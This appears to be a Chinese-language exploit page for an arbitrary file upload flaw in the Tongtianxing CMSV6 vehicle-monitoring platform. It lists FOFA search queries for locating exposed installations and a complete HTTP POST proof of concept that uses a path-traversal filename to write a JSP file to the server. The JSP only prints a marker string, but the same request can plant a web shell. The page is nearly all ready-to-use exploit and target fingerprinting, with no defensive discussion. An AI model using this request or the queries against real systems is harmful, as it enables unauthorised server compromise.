跳到主要内容

通天星-CMSV6-inspect_file-upload存在任意文件上传漏洞

通天星-CMSV6-inspect_file-upload存在任意文件上传漏洞

fofa

body="./open/webApi.html"||body="/808gps/"

poc

POST /inspect_file/upload HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 226
Content-Type: multipart/form-data; boundary=2e7688d712bcc913201f327059f9976b

--2e7688d712bcc913201f327059f9976b
Content-Disposition: form-data; name="uploadFile"; filename="../707140.jsp"
Content-Type: application/octet-stream

<% out.println("007319607"); %>
--2e7688d712bcc913201f327059f9976b--

image-20240524224902984